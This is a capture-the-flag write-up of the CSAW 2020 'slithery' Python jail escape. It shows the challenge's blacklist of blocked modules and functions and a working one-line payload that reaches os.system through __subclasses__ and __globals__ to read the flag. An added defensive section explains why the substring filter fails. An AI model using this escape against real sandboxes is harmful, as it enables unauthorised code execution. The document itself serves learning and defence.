# slithery (Pwn, 100 points)

> Setting up a new coding environment for my data science students. Some of them
> are l33t h4ck3rs that got RCE and crashed my machine a few times :(. Can you
> help test this before I use it for my class? Two sandboxes should be better than
> one...
> nc pwn.chal.csaw.io 5011

FLAG = flag{y4_sl1th3r3d_0ut}

This challenge is a Python jail escape. This being the first Python jail escape I have ever tried and completed, I will give a brief summary of how I completed it the unintended way.

While skimming the Python script, I saw a check to see if the user's input was in a blacklist.

```python
command = input(">>> ")
if any([x in command for x in blacklist.BLACKLIST]):
    raise Exception("not allowed!!")
```

So I connected to the server and ran the following command to get all the words that were blacklisted.

```
['__builtins__', '__import__', 'eval', 'exec', 'import',
'from', 'os', 'sys', 'system', 'timeit', 'base64commands',
'subprocess', 'pty', 'platform', 'open', 'read', 'write',
'dir', 'type']
```

At this point I knew what commands I couldn't use and got completely stuck. I looked up other Python jail escape CTF challenges and came across two helpful writeups.

[Escaping Python Jails](https://anee.me/escaping-python-jails-849c65cf306e)
[Python SSTI](https://misakikata.github.io/2020/04/python-%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8%E4%B8%8ESSTI/)

It took me a lot of trial and error to finally come up with this over-engineered script.

```python
print(''.__class__.__mro__[1].__subclasses__()[109].__init__.__globals__['SYS'.lower()].modules['OS'.lower()].__dict__['SYSTEM'.lower()]('cat flag.txt'))
```
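Why the substring blacklist lets that line through, and what a parse-based check would have seen instead, as an added example (not part of the original writeup or the challenge source). `blacklist_hits` reproduces the check quoted above; `ast_findings` is a hypothetical stricter filter, and the payload is only parsed, never executed.

```python
import ast

# Blacklist as printed in the writeup above.
BLACKLIST = ['__builtins__', '__import__', 'eval', 'exec', 'import',
             'from', 'os', 'sys', 'system', 'timeit', 'base64commands',
             'subprocess', 'pty', 'platform', 'open', 'read', 'write',
             'dir', 'type']

# Payload from the writeup above (inspected as text and AST only).
PAYLOAD = ("print(''.__class__.__mro__[1].__subclasses__()[109].__init__"
           ".__globals__['SYS'.lower()].modules['OS'.lower()]"
           ".__dict__['SYSTEM'.lower()]('cat flag.txt'))")


def blacklist_hits(command):
    """The challenge's check: case-sensitive substring match on raw text."""
    return [word for word in BLACKLIST if word in command]


def ast_findings(command):
    """Hypothetical filter (an assumption, not the challenge's code):
    parse the input and report constructs the substring check misses."""
    findings = []
    for node in ast.walk(ast.parse(command)):
        # Dunder attribute access is how the payload walks from a str
        # literal to another module's globals.
        if isinstance(node, ast.Attribute) and node.attr.startswith("__"):
            findings.append("dunder attribute: " + node.attr)
        # String constants equal to a blacklisted word once case is folded,
        # e.g. 'SYS' rebuilt at runtime with .lower().
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if node.value.lower() in BLACKLIST:
                findings.append("case-folded blacklist word: "
                                + repr(node.value))
    return findings


if __name__ == "__main__":
    print("substring blacklist hits:", blacklist_hits(PAYLOAD))
    for finding in ast_findings(PAYLOAD):
        print("AST finding:", finding)
```

A syntax-level filter like this narrows the accepted input but is still not an isolation boundary; untrusted student code needs process- or container-level confinement around the interpreter.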

I did look at the server to see where the flag was and I found the intended solution in the same directory as the flag.

I learned a lot from this challenge and hopefully will complete more of these.

Original writeup (https://github.com/autun12/CTF-Writeups/tree/master/CSAWCTF2020/BinaryExploitation/slithery_COMPLETED/README.md).